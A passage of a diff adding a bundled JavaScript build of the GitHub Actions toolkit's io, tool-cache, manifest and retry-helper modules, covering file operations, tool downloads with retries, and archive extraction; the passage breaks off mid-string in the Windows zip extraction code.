exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; +const fs = __importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +_a = fs.promises +// export const {open} = 'fs' +, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; +// export const {open} = 'fs' +exports.IS_WINDOWS = process.platform === 'win32'; +// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 +exports.UV_FS_O_EXLOCK = 0x10000000; +exports.READONLY = fs.constants.O_RDONLY; +function exists(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + try { + yield exports.stat(fsPath); + } + catch (err) { + if (err.code === 'ENOENT') { + return false; + } + throw err; + } + return true; + }); +} +exports.exists = exists; +function isDirectory(fsPath, useStat = false) { + return __awaiter(this, void 0, void 0, function* () { + const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); + return stats.isDirectory(); + }); +} +exports.isDirectory = isDirectory; +/** + * On OSX/Linux, true if path starts with '/'. On Windows, true for paths like: + * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). + */ +function isRooted(p) { + p = normalizeSeparators(p); + if (!p) { + throw new Error('isRooted() parameter "p" cannot be empty'); + } + if (exports.IS_WINDOWS) { + return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello + ); // e.g. C: or C:\hello + } + return p.startsWith('/'); +} +exports.isRooted = isRooted; +/** + * Best effort attempt to determine whether a file exists and is executable. + * @param filePath file path to check + * @param extensions additional file extensions to try + * @return if file exists and is executable, returns the file path. otherwise empty string. + */ +function tryGetExecutablePath(filePath, extensions) { + return __awaiter(this, void 0, void 0, function* () { + let stats = undefined; + try { + // test file exists + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // on Windows, test for valid extension + const upperExt = path.extname(filePath).toUpperCase(); + if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { + return filePath; + } + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + // try each extension + const originalFilePath = filePath; + for (const extension of extensions) { + filePath = originalFilePath + extension; + stats = undefined; + try { + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // preserve the case of the actual file (since an extension was appended) + try { + const directory = path.dirname(filePath); + const upperName = path.basename(filePath).toUpperCase(); + for (const actualName of yield exports.readdir(directory)) { + if (upperName === actualName.toUpperCase()) { + filePath = path.join(directory, actualName); + break; + } + } + } + catch (err) { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); + } + return filePath; + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + } + return ''; + }); +} +exports.tryGetExecutablePath = tryGetExecutablePath; +function normalizeSeparators(p) { + p = p || ''; + if (exports.IS_WINDOWS) { + // convert slashes on Windows + p = p.replace(/\//g, '\\'); + // remove redundant slashes + return p.replace(/\\\\+/g, '\\'); + } + // remove redundant slashes + return p.replace(/\/\/+/g, '/'); +} +// on Mac/Linux, test the execute bit +// R W X R W X R W X +// 256 128 64 32 16 8 4 2 1 +function isUnixExecutable(stats) { + return ((stats.mode & 1) > 0 || + ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || + ((stats.mode & 64) > 0 && stats.uid === process.getuid())); +} +// Get the path of cmd.exe in windows +function getCmdPath() { + var _a; + return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; +} +exports.getCmdPath = getCmdPath; +//# sourceMappingURL=io-util.js.map + +/***/ }), + +/***/ 7436: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.findInPath = exports.which = exports.mkdirP = exports.rmRF = exports.mv = exports.cp = void 0; +const assert_1 = __nccwpck_require__(9491); +const path = __importStar(__nccwpck_require__(1017)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +/** + * Copies a file or folder. + * Based off of shelljs - https://github.com/shelljs/shelljs/blob/9237f66c52e5daa40458f94f9565e18e8132f5a6/src/cp.js + * + * @param source source path + * @param dest destination path + * @param options optional. See CopyOptions. + */ +function cp(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + const { force, recursive, copySourceDirectory } = readCopyOptions(options); + const destStat = (yield ioUtil.exists(dest)) ? yield ioUtil.stat(dest) : null; + // Dest is an existing file, but not forcing + if (destStat && destStat.isFile() && !force) { + return; + } + // If dest is an existing directory, should copy inside. + const newDest = destStat && destStat.isDirectory() && copySourceDirectory + ? path.join(dest, path.basename(source)) + : dest; + if (!(yield ioUtil.exists(source))) { + throw new Error(`no such file or directory: ${source}`); + } + const sourceStat = yield ioUtil.stat(source); + if (sourceStat.isDirectory()) { + if (!recursive) { + throw new Error(`Failed to copy. ${source} is a directory, but tried to copy without recursive flag.`); + } + else { + yield cpDirRecursive(source, newDest, 0, force); + } + } + else { + if (path.relative(source, newDest) === '') { + // a file cannot be copied to itself + throw new Error(`'${newDest}' and '${source}' are the same file`); + } + yield copyFile(source, newDest, force); + } + }); +} +exports.cp = cp; +/** + * Moves a path. + * + * @param source source path + * @param dest destination path + * @param options optional. See MoveOptions. + */ +function mv(source, dest, options = {}) { + return __awaiter(this, void 0, void 0, function* () { + if (yield ioUtil.exists(dest)) { + let destExists = true; + if (yield ioUtil.isDirectory(dest)) { + // If dest is directory copy src into dest + dest = path.join(dest, path.basename(source)); + destExists = yield ioUtil.exists(dest); + } + if (destExists) { + if (options.force == null || options.force) { + yield rmRF(dest); + } + else { + throw new Error('Destination already exists'); + } + } + } + yield mkdirP(path.dirname(dest)); + yield ioUtil.rename(source, dest); + }); +} +exports.mv = mv; +/** + * Remove a path recursively with force + * + * @param inputPath path to remove + */ +function rmRF(inputPath) { + return __awaiter(this, void 0, void 0, function* () { + if (ioUtil.IS_WINDOWS) { + // Check for invalid characters + // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file + if (/[*"<>|]/.test(inputPath)) { + throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); + } + } + try { + // note if path does not exist, error is silent + yield ioUtil.rm(inputPath, { + force: true, + maxRetries: 3, + recursive: true, + retryDelay: 300 + }); + } + catch (err) { + throw new Error(`File was unable to be removed ${err}`); + } + }); +} +exports.rmRF = rmRF; +/** + * Make a directory. Creates the full path with folders in between + * Will throw if it fails + * + * @param fsPath path to create + * @returns Promise + */ +function mkdirP(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(fsPath, 'a path argument must be provided'); + yield ioUtil.mkdir(fsPath, { recursive: true }); + }); +} +exports.mkdirP = mkdirP; +/** + * Returns path of a tool had the tool actually been invoked. Resolves via paths. + * If you check and the tool does not exist, it will throw. + * + * @param tool name of the tool + * @param check whether to check if tool exists + * @returns Promise path to tool + */ +function which(tool, check) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // recursive when check=true + if (check) { + const result = yield which(tool, false); + if (!result) { + if (ioUtil.IS_WINDOWS) { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); + } + else { + throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); + } + } + return result; + } + const matches = yield findInPath(tool); + if (matches && matches.length > 0) { + return matches[0]; + } + return ''; + }); +} +exports.which = which; +/** + * Returns a list of all occurrences of the given tool on the system path. + * + * @returns Promise the paths of the tool + */ +function findInPath(tool) { + return __awaiter(this, void 0, void 0, function* () { + if (!tool) { + throw new Error("parameter 'tool' is required"); + } + // build the list of extensions to try + const extensions = []; + if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { + for (const extension of process.env['PATHEXT'].split(path.delimiter)) { + if (extension) { + extensions.push(extension); + } + } + } + // if it's rooted, return it if exists. otherwise return empty. + if (ioUtil.isRooted(tool)) { + const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); + if (filePath) { + return [filePath]; + } + return []; + } + // if any path separators, return empty + if (tool.includes(path.sep)) { + return []; + } + // build the list of directories + // + // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, + // it feels like we should not do this. Checking the current directory seems like more of a use + // case of a shell, and the which() function exposed by the toolkit should strive for consistency + // across platforms. + const directories = []; + if (process.env.PATH) { + for (const p of process.env.PATH.split(path.delimiter)) { + if (p) { + directories.push(p); + } + } + } + // find all matches + const matches = []; + for (const directory of directories) { + const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); + if (filePath) { + matches.push(filePath); + } + } + return matches; + }); +} +exports.findInPath = findInPath; +function readCopyOptions(options) { + const force = options.force == null ? true : options.force; + const recursive = Boolean(options.recursive); + const copySourceDirectory = options.copySourceDirectory == null + ? true + : Boolean(options.copySourceDirectory); + return { force, recursive, copySourceDirectory }; +} +function cpDirRecursive(sourceDir, destDir, currentDepth, force) { + return __awaiter(this, void 0, void 0, function* () { + // Ensure there is not a run away recursive copy + if (currentDepth >= 255) + return; + currentDepth++; + yield mkdirP(destDir); + const files = yield ioUtil.readdir(sourceDir); + for (const fileName of files) { + const srcFile = `${sourceDir}/${fileName}`; + const destFile = `${destDir}/${fileName}`; + const srcFileStat = yield ioUtil.lstat(srcFile); + if (srcFileStat.isDirectory()) { + // Recurse + yield cpDirRecursive(srcFile, destFile, currentDepth, force); + } + else { + yield copyFile(srcFile, destFile, force); + } + } + // Change the mode for the newly created directory + yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); + }); +} +// Buffered file copy +function copyFile(srcFile, destFile, force) { + return __awaiter(this, void 0, void 0, function* () { + if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { + // unlink/re-link it + try { + yield ioUtil.lstat(destFile); + yield ioUtil.unlink(destFile); + } + catch (e) { + // Try to override file permission + if (e.code === 'EPERM') { + yield ioUtil.chmod(destFile, '0666'); + yield ioUtil.unlink(destFile); + } + // other errors = it doesn't exist, no work to do + } + // Copy over symlink + const symlinkFull = yield ioUtil.readlink(srcFile); + yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); + } + else if (!(yield ioUtil.exists(destFile)) || force) { + yield ioUtil.copyFile(srcFile, destFile); + } + }); +} +//# sourceMappingURL=io.js.map + +/***/ }), + +/***/ 2473: +/***/ (function(module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; +const semver = __importStar(__nccwpck_require__(5911)); +const core_1 = __nccwpck_require__(2186); +// needs to be require for core node modules to be mocked +/* eslint @typescript-eslint/no-require-imports: 0 */ +const os = __nccwpck_require__(2037); +const cp = __nccwpck_require__(2081); +const fs = __nccwpck_require__(7147); +function _findMatch(versionSpec, stable, candidates, archFilter) { + return __awaiter(this, void 0, void 0, function* () { + const platFilter = os.platform(); + let result; + let match; + let file; + for (const candidate of candidates) { + const version = candidate.version; + core_1.debug(`check ${version} satisfies ${versionSpec}`); + if (semver.satisfies(version, versionSpec) && + (!stable || candidate.stable === stable)) { + file = candidate.files.find(item => { + core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); + let chk = item.arch === archFilter && item.platform === platFilter; + if (chk && item.platform_version) { + const osVersion = module.exports._getOsVersion(); + if (osVersion === item.platform_version) { + chk = true; + } + else { + chk = semver.satisfies(osVersion, item.platform_version); + } + } + return chk; + }); + if (file) { + core_1.debug(`matched ${candidate.version}`); + match = candidate; + break; + } + } + } + if (match && file) { + // clone since we're mutating the file list to be only the file that matches + result = Object.assign({}, match); + result.files = [file]; + } + return result; + }); +} +exports._findMatch = _findMatch; +function _getOsVersion() { + // TODO: add windows and other linux, arm variants + // right now filtering on version is only an ubuntu and macos scenario for tools we build for hosted (python) + const plat = os.platform(); + let version = ''; + if (plat === 'darwin') { + version = cp.execSync('sw_vers -productVersion').toString(); + } + else if (plat === 'linux') { + // lsb_release process not in some containers, readfile + // Run cat /etc/lsb-release + // DISTRIB_ID=Ubuntu + // DISTRIB_RELEASE=18.04 + // DISTRIB_CODENAME=bionic + // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" + const lsbContents = module.exports._readLinuxVersionFile(); + if (lsbContents) { + const lines = lsbContents.split('\n'); + for (const line of lines) { + const parts = line.split('='); + if (parts.length === 2 && + (parts[0].trim() === 'VERSION_ID' || + parts[0].trim() === 'DISTRIB_RELEASE')) { + version = parts[1] + .trim() + .replace(/^"/, '') + .replace(/"$/, ''); + break; + } + } + } + } + return version; +} +exports._getOsVersion = _getOsVersion; +function _readLinuxVersionFile() { + const lsbReleaseFile = '/etc/lsb-release'; + const osReleaseFile = '/etc/os-release'; + let contents = ''; + if (fs.existsSync(lsbReleaseFile)) { + contents = fs.readFileSync(lsbReleaseFile).toString(); + } + else if (fs.existsSync(osReleaseFile)) { + contents = fs.readFileSync(osReleaseFile).toString(); + } + return contents; +} +exports._readLinuxVersionFile = _readLinuxVersionFile; +//# sourceMappingURL=manifest.js.map + +/***/ }), + +/***/ 8279: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.RetryHelper = void 0; +const core = __importStar(__nccwpck_require__(2186)); +/** + * Internal class for retries + */ +class RetryHelper { + constructor(maxAttempts, minSeconds, maxSeconds) { + if (maxAttempts < 1) { + throw new Error('max attempts should be greater than or equal to 1'); + } + this.maxAttempts = maxAttempts; + this.minSeconds = Math.floor(minSeconds); + this.maxSeconds = Math.floor(maxSeconds); + if (this.minSeconds > this.maxSeconds) { + throw new Error('min seconds should be less than or equal to max seconds'); + } + } + execute(action, isRetryable) { + return __awaiter(this, void 0, void 0, function* () { + let attempt = 1; + while (attempt < this.maxAttempts) { + // Try + try { + return yield action(); + } + catch (err) { + if (isRetryable && !isRetryable(err)) { + throw err; + } + core.info(err.message); + } + // Sleep + const seconds = this.getSleepAmount(); + core.info(`Waiting ${seconds} seconds before trying again`); + yield this.sleep(seconds); + attempt++; + } + // Last attempt + return yield action(); + }); + } + getSleepAmount() { + return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + + this.minSeconds); + } + sleep(seconds) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise(resolve => setTimeout(resolve, seconds * 1000)); + }); + } +} +exports.RetryHelper = RetryHelper; +//# sourceMappingURL=retry-helper.js.map + +/***/ }), + +/***/ 7784: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var __importDefault = (this && this.__importDefault) || function (mod) { + return (mod && mod.__esModule) ? mod : { "default": mod }; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; +const core = __importStar(__nccwpck_require__(2186)); +const io = __importStar(__nccwpck_require__(7436)); +const fs = __importStar(__nccwpck_require__(7147)); +const mm = __importStar(__nccwpck_require__(2473)); +const os = __importStar(__nccwpck_require__(2037)); +const path = __importStar(__nccwpck_require__(1017)); +const httpm = __importStar(__nccwpck_require__(6255)); +const semver = __importStar(__nccwpck_require__(5911)); +const stream = __importStar(__nccwpck_require__(2781)); +const util = __importStar(__nccwpck_require__(3837)); +const assert_1 = __nccwpck_require__(9491); +const v4_1 = __importDefault(__nccwpck_require__(7468)); +const exec_1 = __nccwpck_require__(1514); +const retry_helper_1 = __nccwpck_require__(8279); +class HTTPError extends Error { + constructor(httpStatusCode) { + super(`Unexpected HTTP response: ${httpStatusCode}`); + this.httpStatusCode = httpStatusCode; + Object.setPrototypeOf(this, new.target.prototype); + } +} +exports.HTTPError = HTTPError; +const IS_WINDOWS = process.platform === 'win32'; +const IS_MAC = process.platform === 'darwin'; +const userAgent = 'actions/tool-cache'; +/** + * Download a tool from an url and stream it into a file + * + * @param url url of tool to download + * @param dest path to download tool + * @param auth authorization header + * @param headers other headers + * @returns path to downloaded tool + */ +function downloadTool(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + dest = dest || path.join(_getTempDirectory(), v4_1.default()); + yield io.mkdirP(path.dirname(dest)); + core.debug(`Downloading ${url}`); + core.debug(`Destination ${dest}`); + const maxAttempts = 3; + const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); + const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); + const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); + return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { + return yield downloadToolAttempt(url, dest || '', auth, headers); + }), (err) => { + if (err instanceof HTTPError && err.httpStatusCode) { + // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests + if (err.httpStatusCode < 500 && + err.httpStatusCode !== 408 && + err.httpStatusCode !== 429) { + return false; + } + } + // Otherwise retry + return true; + }); + }); +} +exports.downloadTool = downloadTool; +function downloadToolAttempt(url, dest, auth, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (fs.existsSync(dest)) { + throw new Error(`Destination file path ${dest} already exists`); + } + // Get the response headers + const http = new httpm.HttpClient(userAgent, [], { + allowRetries: false + }); + if (auth) { + core.debug('set auth'); + if (headers === undefined) { + headers = {}; + } + headers.authorization = auth; + } + const response = yield http.get(url, headers); + if (response.message.statusCode !== 200) { + const err = new HTTPError(response.message.statusCode); + core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); + throw err; + } + // Download the response body + const pipeline = util.promisify(stream.pipeline); + const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); + const readStream = responseMessageFactory(); + let succeeded = false; + try { + yield pipeline(readStream, fs.createWriteStream(dest)); + core.debug('download complete'); + succeeded = true; + return dest; + } + finally { + // Error, delete dest before retry + if (!succeeded) { + core.debug('download failed'); + try { + yield io.rmRF(dest); + } + catch (err) { + core.debug(`Failed to delete '${dest}'. ${err.message}`); + } + } + } + }); +} +/** + * Extract a .7z file + * + * @param file path to the .7z file + * @param dest destination directory. Optional. + * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this + * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will + * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is + * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line + * interface, it is smaller than the full command line interface, and it does support long paths. At the + * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. + * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path + * to 7zr.exe can be pass to this function. + * @returns path to the destination directory + */ +function extract7z(file, dest, _7zPath) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + const originalCwd = process.cwd(); + process.chdir(dest); + if (_7zPath) { + try { + const logLevel = core.isDebug() ? '-bb1' : '-bb0'; + const args = [ + 'x', + logLevel, + '-bd', + '-sccUTF-8', + file + ]; + const options = { + silent: true + }; + yield exec_1.exec(`"${_7zPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + else { + const escapedScript = path + .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') + .replace(/'/g, "''") + .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; + const args = [ + '-NoLogo', + '-Sta', + '-NoProfile', + '-NonInteractive', + '-ExecutionPolicy', + 'Unrestricted', + '-Command', + command + ]; + const options = { + silent: true + }; + try { + const powershellPath = yield io.which('powershell', true); + yield exec_1.exec(`"${powershellPath}"`, args, options); + } + finally { + process.chdir(originalCwd); + } + } + return dest; + }); +} +exports.extract7z = extract7z; +/** + * Extract a compressed tar archive + * + * @param file path to the tar + * @param dest destination directory. Optional. + * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. + * @returns path to the destination directory + */ +function extractTar(file, dest, flags = 'xz') { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + // Create dest + dest = yield _createExtractFolder(dest); + // Determine whether GNU tar + core.debug('Checking tar --version'); + let versionOutput = ''; + yield exec_1.exec('tar --version', [], { + ignoreReturnCode: true, + silent: true, + listeners: { + stdout: (data) => (versionOutput += data.toString()), + stderr: (data) => (versionOutput += data.toString()) + } + }); + core.debug(versionOutput.trim()); + const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); + // Initialize args + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + if (core.isDebug() && !flags.includes('v')) { + args.push('-v'); + } + let destArg = dest; + let fileArg = file; + if (IS_WINDOWS && isGnuTar) { + args.push('--force-local'); + destArg = dest.replace(/\\/g, '/'); + // Technically only the dest needs to have `/` but for aesthetic consistency + // convert slashes in the file arg too. + fileArg = file.replace(/\\/g, '/'); + } + if (isGnuTar) { + // Suppress warnings when using GNU tar to extract archives created by BSD tar + args.push('--warning=no-unknown-keyword'); + args.push('--overwrite'); + } + args.push('-C', destArg, '-f', fileArg); + yield exec_1.exec(`tar`, args); + return dest; + }); +} +exports.extractTar = extractTar; +/** + * Extract a xar compatible archive + * + * @param file path to the archive + * @param dest destination directory. Optional. + * @param flags flags for the xar. Optional. + * @returns path to the destination directory + */ +function extractXar(file, dest, flags = []) { + return __awaiter(this, void 0, void 0, function* () { + assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); + assert_1.ok(file, 'parameter "file" is required'); + dest = yield _createExtractFolder(dest); + let args; + if (flags instanceof Array) { + args = flags; + } + else { + args = [flags]; + } + args.push('-x', '-C', dest, '-f', file); + if (core.isDebug()) { + args.push('-v'); + } + const xarPath = yield io.which('xar', true); + yield exec_1.exec(`"${xarPath}"`, _unique(args)); + return dest; + }); +} +exports.extractXar = extractXar; +/** + * Extract a zip + * + * @param file path to the zip + * @param dest destination directory. Optional. + * @returns path to the destination directory + */ +function extractZip(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + if (!file) { + throw new Error("parameter 'file' is required"); + } + dest = yield _createExtractFolder(dest); + if (IS_WINDOWS) { + yield extractZipWin(file, dest); + } + else { + yield extractZipNix(file, dest); + } + return dest; + }); +} +exports.extractZip = extractZip; +function extractZipWin(file, dest) { + return __awaiter(this, void 0, void 0, function* () { + // build the powershell command + const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines + const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); + const pwshPath = yield io.which('pwsh', false); + //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory + //and the -Force flag for Expand-Archive as a fallback + if (pwshPath) { + //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive + const pwshCommand = [ + `$ErrorActionPreference = 'Stop' ;`, + `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, + `try { [System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, + `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath 